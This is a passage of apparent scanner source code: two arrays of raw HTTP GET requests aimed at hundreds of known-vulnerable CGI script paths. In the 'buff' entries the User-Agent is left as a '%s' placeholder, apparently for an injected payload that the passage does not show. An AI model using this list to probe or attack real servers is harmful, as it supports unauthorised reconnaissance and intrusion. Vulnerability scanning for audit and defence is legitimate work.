buff[253] = "GET /cgi-bin/ttawebtop.cgi/ HTTP/1.0\nUser-Agent:%s\n\n";
buff[254] = "GET /cgi-bin/ultraboard.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[255] = "GET /cgi-bin/upload.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[256] = "GET /cgi-bin/urlcount.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[257] = "GET /cgi-bin/viewcvs.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[258] = "GET /cgi-bin/viralator.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[259] = "GET /cgi-bin/virgil.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[260] = "GET /cgi-bin/vote.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[261] = "GET /cgi-bin/vpasswd.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[262] = "GET /cgi-bin/way-board.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[263] = "GET /cgi-bin/way-board/way-board.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[264] = "GET /cgi-bin/webbbs.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[265] = "GET /cgi-bin/webcart/webcart.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[266] = "GET /cgi-bin/webdist.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[267] = "GET /cgi-bin/webif.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[268] = "GET /cgi-bin/webmail/html/emumail.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[269] = "GET /cgi-bin/webmap.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[270] = "GET /cgi-bin/webspirs.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[271] = "GET /cgi-bin/whois.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[272] = "GET /cgi-bin/whois/whois.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[273] = "GET /cgi-bin/whois_raw.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[274] = "GET /cgi-bin/wrap HTTP/1.0\nUser-Agent:%s\n\n";
buff[275] = "GET /cgi-bin/wrap.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[276] = "GET /cgi-bin/wwwboard.cgi.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[277] = "GET /cgi-bin/YaBB/YaBB.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[278] = "GET /cgi-bin/zml.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[279] = "GET /cgi-sys/addalink.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[280] = "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[281] = "GET /cgi-sys/domainredirect.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[282] = "GET /cgi-sys/entropybanner.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[283] = "GET /cgi-sys/entropysearch.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[284] = "GET /cgi-sys/FormMail-clone.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[285] = "GET /cgi-sys/helpdesk.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[286] = "GET /cgi-sys/mchat.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[287] = "GET /cgi-sys/randhtml.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[288] = "GET /cgi-sys/realhelpdesk.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[289] = "GET /cgi-sys/realsignup.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[290] = "GET /cgi-sys/signup.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[291] = "GET /cgis/wwwboard/wwwboard.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[292] = "GET /connector.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[293] = "GET /cp/rac/nsManager.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[294] = "GET /create_release.sh HTTP/1.0\nUser-Agent:%s\n\n";
buff[295] = "GET /CSNews.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[296] = "GET /csPassword.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[297] = "GET /dcadmin.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[298] = "GET /dcboard.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[299] = "GET /dcforum.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[300] = "GET /dcforum/dcforum.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[301] = "GET /debuff.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[302] = "GET /details.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[303] = "GET /edittag/edittag.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[304] = "GET /emumail.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[305] = "GET /enter_buff.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[306] = "GET /ez2000/ezadmin.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[307] = "GET /ez2000/ezboard.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[308] = "GET /ez2000/ezman.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[309] = "GET /fcgi-bin/echo HTTP/1.0\nUser-Agent:%s\n\n";
buff[310] = "GET /fcgi-bin/echo2 HTTP/1.0\nUser-Agent:%s\n\n";
buff[311] = "GET /Gozila.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[312] = "GET /hitmatic/analyse.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[313] = "GET /html/cgi-bin/cgicso HTTP/1.0\nUser-Agent:%s\n\n";
buff[314] = "GET /index.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[315] = "GET /info.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[316] = "GET /infosrch.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[317] = "GET /login.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[318] = "GET /mailview.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[319] = "GET /main.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[320] = "GET /megabook/admin.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[321] = "GET /ministats/admin.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[322] = "GET /mods/apage/apage.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[323] = "GET /musicqueue.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[324] = "GET /ncbook.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[325] = "GET /newpro.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[326] = "GET /newsletter.sh HTTP/1.0\nUser-Agent:%s\n\n";
buff[327] = "GET /oem_webstage/cgi-bin/oemapp_cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[328] = "GET /page.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[329] = "GET /parse_xml.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[330] = "GET /photo/manage.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[331] = "GET /photodata/manage.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[332] = "GET /print.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[333] = "GET /process_buff.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[334] = "GET /pub/english.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[335] = "GET /quikmail/nph-emumail.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[336] = "GET /quikstore.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[337] = "GET /reviews/newpro.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[338] = "GET /ROADS/cgi-bin/search.pl HTTP/1.0\nUser-Agent:%s\n\n";
buff[339] = "GET /sample01.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[340] = "GET /sample02.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[341] = "GET /sample03.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[342] = "GET /sample04.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[343] = "GET /sampleposteddata.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[344] = "GET /scancfg.cgi\n\n";
buff[345] = "GET /servers/link.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[346] = "GET /setpasswd.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[347] = "GET /SetSecurity.shm HTTP/1.0\nUser-Agent:%s\n\n";
buff[348] = "GET /shop/member_html.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[349] = "GET /shop/normal_html.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[350] = "GET /site_searcher.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[351] = "GET /siteUserMod.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[352] = "GET /submit.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[353] = "GET /technote/print.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[354] = "GET /template.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[355] = "GET /test.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[356] = "GET /upload.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[357] = "GET /userreg.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[358] = "GET /users/scripts/submit.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[359] = "GET /Web_Store/web_store.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[360] = "GET /webtools/bonsai/ccvsblame.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[361] = "GET /webtools/bonsai/cvsblame.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[362] = "GET /webtools/bonsai/cvslog.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[363] = "GET /webtools/bonsai/cvsquery.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[364] = "GET /webtools/bonsai/cvsqueryform.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[365] = "GET /webtools/bonsai/showcheckins.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[366] = "GET /wwwadmin.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[367] = "GET /wwwboard.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[368] = "GET /cgi-sys/entropysearch.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[369] = "GET /cgi-sys/FormMail-clone.cgi HTTP/1.0\nUser-Agent:%s\n\n";
buff[370] = "GET /wwwboard/wwwboard.cgi HTTP/1.0\nUser-Agent:%s\n\n";

bug[1] = "GET /_mt/mt.cgi HTTP/1.0\n\n";
bug[2] = "GET /admin.cgi HTTP/1.0\n\n";
bug[3] = "GET /administrator.cgi HTTP/1.0\n\n";
bug[4] = "GET /agora.cgi HTTP/1.0\n\n";
bug[5] = "GET /aktivate/cgi-bin/catgy.cgi HTTP/1.0\n\n";
bug[6] = "GET /analyse.cgi HTTP/1.0\n\n";
bug[7] = "GET /apps/web/vs_diag.cgi HTTP/1.0\n\n";
bug[8] = "GET /axis-cgi/buffer/command.cgi HTTP/1.0\n\n";
bug[9] = "GET /bandwidth/index.cgi HTTP/1.0\n\n";
bug[10] = "GET /bigconf.cgi HTTP/1.0\n\n";
bug[11] = "GET /cart.cgi HTTP/1.0\n\n";
bug[12] = "GET /cartcart.cgi HTTP/1.0\n\n";
bug[13] = "GET /ccbill/whereami.cgi HTTP/1.0\n\n";
bug[14] = "GET /cgi-bin/status HTTP/1.0\n\n";
bug[15] = "GET /cgi-bin-sdb/printenv HTTP/1.0\n\n";
bug[16] = "GET /cgi-bin/.cobalt/alert/service.cgi HTTP/1.0\n\n";
bug[17] = "GET /cgi-bin/.cobalt/message/message.cgi HTTP/1.0\n\n";
bug[18] = "GET /cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi HTTP/1.0\n\n";
bug[19] = "GET /cgi-bin/.namazu.cgi HTTP/1.0\n\n";
bug[20] = "GET /cgi-bin/14all-1.1.cgi HTTP/1.0\n\n";
bug[21] = "GET /cgi-bin/14all.cgi HTTP/1.0\n\n";
bug[22] = "GET /cgi-bin/a1disp3.cgi HTTP/1.0\n\n";
bug[23] = "GET /cgi-bin/a1stats/a1disp3.cgi HTTP/1.0\n\n";
bug[24] = "GET /cgi-bin/a1stats/a1disp4.cgi HTTP/1.0\n\n";
bug[25] = "GET /cgi-bin/add_ftp.cgi HTTP/1.0\n\n";
bug[26] = "GET /cgi-bin/addbanner.cgi HTTP/1.0\n\n";
bug[27] = "GET /cgi-bin/adduser.cgi HTTP/1.0\n\n";
bug[28] = "GET /cgi-bin/admin.cgi HTTP/1.0\n\n";
bug[29] = "GET /cgi-bin/admin.pl HTTP/1.0\n\n";
bug[30] = "GET /cgi-bin/admin/admin.cgi HTTP/1.0\n\n";
bug[31] = "GET /cgi-bin/admin/setup.cgi HTTP/1.0\n\n";
bug[32] = "GET /cgi-bin/adminhot.cgi HTTP/1.0\n\n";
bug[33] = "GET /cgi-bin/adminwww.cgi HTTP/1.0\n\n";
bug[34] = "GET /cgi-bin/af.cgi HTTP/1.0\n\n";
bug[35] = "GET /cgi-bin/aglimpse.cgi HTTP/1.0\n\n";
bug[36] = "GET /cgi-bin/alienform.cgi HTTP/1.0\n\n";
bug[37] = "GET /cgi-bin/AnyBoard.cgi HTTP/1.0\n\n";
bug[38] = "GET /cgi-bin/architext_query.cgi HTTP/1.0\n\n";
bug[39] = "GET /cgi-bin/astrocam.cgi HTTP/1.0\n\n";
bug[40] = "GET /cgi-bin/AT-admin.cgi HTTP/1.0\n\n";
bug[41] = "GET /cgi-bin/AT-generate.cgi HTTP/1.0\n\n";
bug[42] = "GET /cgi-bin/auction/auction.cgi HTTP/1.0\n\n";
bug[43] = "GET /cgi-bin/auktion.cgi HTTP/1.0\n\n";
bug[44] = "GET /cgi-bin/ax-admin.cgi HTTP/1.0\n\n";
bug[45] = "GET /cgi-bin/ax.cgi HTTP/1.0\n\n";
bug[46] = "GET /cgi-bin/axs.cgi HTTP/1.0\n\n";
bug[47] = "GET /cgi-bin/badmin.cgi HTTP/1.0\n\n";
bug[48] = "GET /cgi-bin/banner.cgi HTTP/1.0\n\n";
bug[49] = "GET /cgi-bin/bannereditor.cgi HTTP/1.0\n\n";
bug[50] = "GET /cgi-bin/bb-ack.sh HTTP/1.0\n\n";
bug[51] = "GET /cgi-bin/bb-hist.sh HTTP/1.0\n\n";
bug[52] = "GET /cgi-bin/bb-histlog.sh HTTP/1.0\n\n";
bug[53] = "GET /cgi-bin/bb-hostsvc.sh HTTP/1.0\n\n";
bug[54] = "GET /cgi-bin/bb-rep.sh HTTP/1.0\n\n";
bug[55] = "GET /cgi-bin/bb-replog.sh HTTP/1.0\n\n";
bug[56] = "GET /cgi-bin/bbs_forum.cgi HTTP/1.0\n\n";
bug[57] = "GET /cgi-bin/bigconf.cgi HTTP/1.0\n\n";
bug[58] = "GET /cgi-bin/bizdb1-search.cgi HTTP/1.0\n\n";
bug[59] = "GET /cgi-bin/blog/mt-check.cgi HTTP/1.0\n\n";
bug[60] = "GET /cgi-bin/blog/mt-load.cgi HTTP/1.0\n\n";
bug[61] = "GET /cgi-bin/bnbform.cgi HTTP/1.0\n\n";
bug[62] = "GET /cgi-bin/book.cgi HTTP/1.0\n\n";
bug[63] = "GET /cgi-bin/boozt/admin/index.cgi HTTP/1.0\n\n";
bug[64] = "GET /cgi-bin/bsguest.cgi HTTP/1.0\n\n";
bug[65] = "GET /cgi-bin/bslist.cgi HTTP/1.0\n\n";
bug[66] = "GET /cgi-bin/build.cgi HTTP/1.0\n\n";
bug[67] = "GET /cgi-bin/bulk/bulk.cgi HTTP/1.0\n\n";
bug[68] = "GET /cgi-bin/c_download.cgi HTTP/1.0\n\n";
bug[69] = "GET /cgi-bin/cached_feed.cgi HTTP/1.0\n\n";
bug[70] = "GET /cgi-bin/cachemgr.cgi HTTP/1.0\n\n";
bug[71] = "GET /cgi-bin/calendar/index.cgi HTTP/1.0\n\n";
bug[72] = "GET /cgi-bin/cartmanager.cgi HTTP/1.0\n\n";
bug[73] = "GET /cgi-bin/cbmc/forums.cgi HTTP/1.0\n\n";
bug[74] = "GET /cgi-bin/ccvsblame.cgi HTTP/1.0\n\n";
bug[75] = "GET /cgi-bin/cgforum.cgi HTTP/1.0\n\n";
bug[76] = "GET /cgi-bin/cgi_process HTTP/1.0\n\n";
bug[77] = "GET /cgi-bin/classified.cgi HTTP/1.0\n\n";
bug[78] = "GET /cgi-bin/classifieds.cgi HTTP/1.0\n\n";
bug[79] = "GET /cgi-bin/classifieds/classifieds.cgi HTTP/1.0\n\n";
bug[80] = "GET /cgi-bin/classifieds/index.cgi HTTP/1.0\n\n";
bug[81] = "GET /cgi-bin/commandit.cgi HTTP/1.0\n\n";
bug[82] = "GET /cgi-bin/commerce.cgi HTTP/1.0\n\n";
bug[83] = "GET /cgi-bin/common/listrec.pl HTTP/1.0\n\n";
bug[84] = "GET /cgi-bin/compatible.cgi HTTP/1.0\n\n";
bug[85] = "GET /cgi-bin/Count.cgi HTTP/1.0\n\n";
bug[86] = "GET /cgi-bin/csChatRBox.cgi HTTP/1.0\n\n";
bug[87] = "GET /cgi-bin/csGuestBook.cgi HTTP/1.0\n\n";
bug[88] = "GET /cgi-bin/csLiveSupport.cgi HTTP/1.0\n\n";
bug[89] = "GET /cgi-bin/CSMailto.cgi HTTP/1.0\n\n";
bug[90] = "GET /cgi-bin/CSMailto/CSMailto.cgi HTTP/1.0\n\n";
bug[91] = "GET /cgi-bin/csNews.cgi HTTP/1.0\n\n";
bug[92] = "GET /cgi-bin/csNewsPro.cgi HTTP/1.0\n\n";
bug[93] = "GET /cgi-bin/csPassword.cgi HTTP/1.0\n\n";
bug[94] = "GET /cgi-bin/csPassword/csPassword.cgi HTTP/1.0\n\n";
bug[95] = "GET /cgi-bin/csSearch.cgi HTTP/1.0\n\n";
bug[96] = "GET /cgi-bin/csv_db.cgi HTTP/1.0\n\n";
bug[97] = "GET /cgi-bin/cvsblame.cgi HTTP/1.0\n\n";
bug[98] = "GET /cgi-bin/cvslog.cgi HTTP/1.0\n\n";
bug[99] = "GET /cgi-bin/cvsquery.cgi HTTP/1.0\n\n";
bug[100] = "GET /cgi-bin/cvsqueryform.cgi HTTP/1.0\n\n";
bug[101] = "GET /cgi-bin/day5datacopier.cgi HTTP/1.0\n\n";
bug[102] = "GET /cgi-bin/day5datanotifier.cgi HTTP/1.0\n\n";
bug[103] = "GET /cgi-bin/db_manager.cgi HTTP/1.0\n\n";
bug[104] = "GET /cgi-bin/dbman/db.cgi HTTP/1.0\n\n";
bug[105] = "GET /cgi-bin/dcforum.cgi HTTP/1.0\n\n";
bug[106] = "GET /cgi-bin/dfire.cgi HTTP/1.0\n\n";
bug[107] = "GET /cgi-bin/diagnose.cgi HTTP/1.0\n\n";
bug[108] = "GET /cgi-bin/dig.cgi HTTP/1.0\n\n";
bug[109] = "GET /cgi-bin/directorypro.cgi HTTP/1.0\n\n";
bug[110] = "GET /cgi-bin/download.cgi HTTP/1.0\n\n";
bug[111] = "GET /cgi-bin/emu/html/emumail.cgi HTTP/1.0\n\n";
bug[112] = "GET /cgi-bin/emumail.cgi HTTP/1.0\n\n";
bug[113] = "GET /cgi-bin/emumail/emumail.cgi HTTP/1.0\n\n";
bug[114] = "GET /cgi-bin/enter.cgi HTTP/1.0\n\n";
bug[115] = "GET /cgi-bin/environ.cgi HTTP/1.0\n\n";
bug[116] = "GET /cgi-bin/ezadmin.cgi HTTP/1.0\n\n";
bug[117] = "GET /cgi-bin/ezboard.cgi HTTP/1.0\n\n";
bug[118] = "GET /cgi-bin/ezman.cgi HTTP/1.0\n\n";
bug[119] = "GET /cgi-bin/ezshopper/loadpage.cgi HTTP/1.0\n\n";
bug[120] = "GET/cgi-bin/ezshopper/search.cgi HTTP/1.0\n\n";
bug[121] = "GET /cgi-bin/ezshopper2/loadpage.cgi HTTP/1.0\n\n";
bug[122] = "GET /cgi-bin/ezshopper3/loadpage.cgi HTTP/1.0\n\n";
bug[123] = "GET /cgi-bin/faqmanager.cgi HTTP/1.0\n\n";
bug[124] = "GET /cgi-bin/FileSeek.cgi HTTP/1.0\n\n";
bug[125] = "GET /cgi-bin/FileSeek2.cgi HTTP/1.0\n\n";
bug[126] = "GET /cgi-bin/finger.cgi HTTP/1.0\n\n";
bug[127] = "GET /cgi-bin/flexform.cgi HTTP/1.0\n\n";
bug[128] = "GET /cgi-bin/fom.cgi HTTP/1.0\n\n";
bug[129] = "GET /cgi-bin/fom/fom.cgi HTTP/1.0\n\n";
bug[130] = "GET /cgi-bin/FormHandler.cgi HTTP/1.0\n\n";
bug[131] = "GET /cgi-bin/FormMail.cgi HTTP/1.0\n\n";
bug[132] = "GET /cgi-bin/gbadmin.cgi HTTP/1.0\n\n";
bug[133] = "GET /cgi-bin/gbook/gbook.cgi HTTP/1.0\n\n";
bug[134] = "GET /cgi-bin/generate.cgi HTTP/1.0\n\n";
bug[135] = "GET /cgi-bin/getdoc.cgi HTTP/1.0\n\n";
bug[136] = "GET /cgi-bin/gH.cgi HTTP/1.0\n\n";
bug[137] = "GET /cgi-bin/gm-authors.cgi HTTP/1.0\n\n";
bug[138] = "GET /cgi-bin/gm-cplog.cgi HTTP/1.0\n\n";
bug[139] = "GET /cgi-bin/gm.cgi HTTP/1.0\n\n";
bug[140] = "GET /cgi-bin/guestbook.cgi HTTP/1.0\n\n";
bug[141] = "GET /cgi-bin/handler HTTP/1.0\n\n";
bug[142] = "GET /cgi-bin/handler.cgi HTTP/1.0\n\n";
bug[143] = "GET /cgi-bin/handler/netsonar HTTP/1.0\n\n";
bug[144] = "GET /cgi-bin/hitview.cgi HTTP/1.0\n\n";
bug[145] = "GET /cgi-bin/hsx.cgi HTTP/1.0\n\n";
bug[146] = "GET /cgi-bin/html2chtml.cgi HTTP/1.0\n\n";
bug[147] = "GET /cgi-bin/html2wml.cgi HTTP/1.0\n\n";
bug[148] = "GET /cgi-bin/htsearch.cgi HTTP/1.0\n\n";
bug[149] = "GET /cgi-bin/icat HTTP/1.0\n\n";
bug[150] = "GET /cgi-bin/if/admin/nph-build.cgi HTTP/1.0\n\n";
bug[151] = "GET /cgi-bin/ikonboard/help.cgi HTTP/1.0\n\n";
bug[152] = "GET /cgi-bin/imageFolio.cgi HTTP/1.0\n\n";
bug[153] = "GET /cgi-bin/ImageFolio/admin/admin.cgi HTTP/1.0\n\n";
bug[154] = "GET /cgi-bin/infosrch.cgi HTTP/1.0\n\n";
bug[155] = "GET /cgi-bin/jammail.pl HTTP/1.0\n\n";
bug[156] = "GET /cgi-bin/journal.cgi HTTP/1.0\n\n";
bug[157] = "GET /cgi-bin/lastlines.cgi HTTP/1.0\n\n";
bug[158] = "GET /cgi-bin/loadpage.cgi HTTP/1.0\n\n";
bug[159] = "GET /cgi-bin/log-reader.cgi HTTP/1.0\n\n";
bug[160] = "GET /cgi-bin/login.cgi HTTP/1.0\n\n";
bug[161] = "GET /cgi-bin/logit.cgi HTTP/1.0\n\n";
bug[162] = "GET /cgi-bin/lookwho.cgi HTTP/1.0\n\n";
bug[163] = "GET /cgi-bin/lwgate.cgi HTTP/1.0\n\n";
bug[164] = "GET /cgi-bin/MachineInfo HTTP/1.0\n\n";
bug[165] = "GET /cgi-bin/magiccard.cgi HTTP/1.0\n\n";
bug[166] = "GET /cgi-bin/mail/emumail.cgi HTTP/1.0\n\n";
bug[167] = "GET /cgi-bin/mail/nph-mr.cgi HTTP/1.0\n\n";
bug[168] = "GET /cgi-bin/maillist.cgi HTTP/1.0\n\n";
bug[169] = "GET /cgi-bin/mailnews.cgi HTTP/1.0\n\n";
bug[170] = "GET /cgi-bin/main.cgi HTTP/1.0\n\n";
bug[171] = "GET /cgi-bin/main_menu.pl HTTP/1.0\n\n";
bug[172] = "GET /cgi-bin/man.sh HTTP/1.0\n\n";
bug[173] = "GET /cgi-bin/mini_logger.cgi HTTP/1.0\n\n";
bug[174] = "GET /cgi-bin/mmstdod.cgi HTTP/1.0\n\n";
bug[175] = "GET /cgi-bin/moin.cgi HTTP/1.0\n\n";
bug[176] = "GET /cgi-bin/mojo/mojo.cgi HTTP/1.0\n\n";
bug[177] = "GET /cgi-bin/mrtg.cgi HTTP/1.0\n\n";
bug[178] = "GET /cgi-bin/mt-static/mt-check.cgi HTTP/1.0\n\n";
bug[179] = "GET /cgi-bin/mt-static/mt-load.cgi HTTP/1.0\n\n";
bug[180] = "GET /cgi-bin/mt/mt-check.cgi HTTP/1.0\n\n";
bug[181] = "GET /cgi-bin/mt/mt-load.cgi HTTP/1.0\n\n";
bug[182] = "GET /cgi-bin/musicqueue.cgi HTTP/1.0\n\n";
bug[183] = "GET /cgi-bin/myguestbook.cgi HTTP/1.0\n\n";
bug[184] = "GET /cgi-bin/netauth.cgi HTTP/1.0\n\n";
bug[185] = "GET /cgi-bin/netpad.cgi HTTP/1.0\n\n";
bug[186] = "GET /cgi-bin/newsdesk.cgi HTTP/1.0\n\n";
bug[187] = "GET /cgi-bin/nlog-smb.cgi HTTP/1.0\n\n";
bug[188] = "GET /cgi-bin/nph-emumail.cgi HTTP/1.0\n\n";
bug[189] = "GET /cgi-bin/nph-exploitscanget.cgi HTTP/1.0\n\n";
bug[190] = "GET /cgi-bin/nph-publish.cgi HTTP/1.0\n\n";
bug[191] = "GET /cgi-bin/nph-test.cgi HTTP/1.0\n\n";
bug[192] = "GET /cgi-bin/pagelog.cgi HTTP/1.0\n\n";
bug[193] = "GET /cgi-bin/pbcgi.cgi HTTP/1.0\n\n";
bug[194] = "GET /cgi-bin/perlshop.cgi HTTP/1.0\n\n";
bug[195] = "GET /cgi-bin/pfdispaly.cgi HTTP/1.0\n\n";
bug[196] = "GET /cgi-bin/pfdisplay.cgi HTTP/1.0\n\n";
bug[197] = "GET /cgi-bin/phf.cgi HTTP/1.0\n\n";
bug[198] = "GET /cgi-bin/photo/manage.cgi HTTP/1.0\n\n";
bug[199] = "GET /cgi-bin/photo/protected/manage.cgi HTTP/1.0\n\n";
bug[200] = "GET /cgi-bin/php.cgi HTTP/1.0\n\n";
bug[201] = "GET /cgi-bin/pollit/Poll_It_SSI_v2.0.cgi HTTP/1.0\n\n";
bug[202] = "GET /cgi-bin/pollssi.cgi HTTP/1.0\n\n";
bug[203] = "GET /cgi-bin/postcards.cgi HTTP/1.0\n\n";
bug[204] = "GET /cgi-bin/powerup/r.cgi HTTP/1.0\n\n";
bug[205] = "GET /cgi-bin/printenv HTTP/1.0\n\n";
bug[206] = "GET /cgi-bin/probecontrol.cgi HTTP/1.0\n\n";
bug[207] = "GET /cgi-bin/profile.cgi HTTP/1.0\n\n";
bug[208] = "GET /cgi-bin/publisher/search.cgi HTTP/1.0\n\n";
bug[209] = "GET /cgi-bin/quickstore.cgi HTTP/1.0\n\n";
bug[210] = "GET /cgi-bin/quizme.cgi HTTP/1.0\n\n";
bug[211] = "GET /cgi-bin/r.cgi HTTP/1.0\n\n";
bug[212] = "GET /cgi-bin/ratlog.cgi HTTP/1.0\n\n";
bug[213] = "GET /cgi-bin/register.cgi HTTP/1.0\n\n";
bug[214] = "GET /cgi-bin/replicator/webpage.cgi/ HTTP/1.0\n\n";
bug[215] = "GET /cgi-bin/responder.cgi HTTP/1.0\n\n";
bug[216] = "GET /cgi-bin/robadmin.cgi HTTP/1.0\n\n";
bug[217] = "GET /cgi-bin/robpoll.cgi HTTP/1.0\n\n";
bug[218] = "GET /cgi-bin/sbcgi/sitebuilder.cgi HTTP/1.0\n\n";
bug[219] = "GET /cgi-bin/scoadminreg.cgi HTTP/1.0\n\n";
bug[220] = "GET /cgi-bin/search HTTP/1.0\n\n";
bug[221] = "GET /cgi-bin/search.cgi HTTP/1.0\n\n";
bug[222] = "GET /cgi-bin/search/search.cgi HTTP/1.0\n\n";
bug[223] = "GET /cgi-bin/sendform.cgi HTTP/1.0\n\n";
bug[224] = "GET /cgi-bin/shop.cgi HTTP/1.0\n\n";
bug[225] = "GET /cgi-bin/shopper.cgi HTTP/1.0\n\n";
bug[226] = "GET /cgi-bin/shopplus.cgi HTTP/1.0\n\n";
bug[227] = "GET /cgi-bin/showcheckins.cgi HTTP/1.0\n\n";
bug[228] = "GET /cgi-bin/simplestguest.cgi HTTP/1.0\n\n";
bug[229] = "GET /cgi-bin/simplestmail.cgi HTTP/1.0\n\n";
bug[230] = "GET /cgi-bin/smartsearch.cgi HTTP/1.0\n\n";
bug[231] = "GET /cgi-bin/smartsearch/smartsearch.cgi HTTP/1.0\n\n";
bug[232] = "GET /cgi-bin/snorkerz.bat HTTP/1.0\n\n";
bug[233] = "GET /cgi-bin/snorkerz.cmd HTTP/1.0\n\n";
bug[234] = "GET /cgi-bin/sojourn.cgi HTTP/1.0\n\n";
bug[235] = "GET /cgi-bin/spin_client.cgi HTTP/1.0\n\n";
bug[236] = "GET /cgi-bin/start.cgi HTTP/1.0\n\n";
bug[237] = "GET /cgi-bin/store.cgi HTTP/1.0\n\n";
bug[238] = "GET /cgi-bin/store/agora.cgi HTTP/1.0\n\n";
bug[239] = "GET /cgi-bin/store/index.cgi HTTP/1.0\n\n";
bug[240] = "GET /cgi-bin/survey.cgi HTTP/1.0\n\n";
bug[241] = "GET /cgi-bin/talkback.cgi HTTP/1.0\n\n";
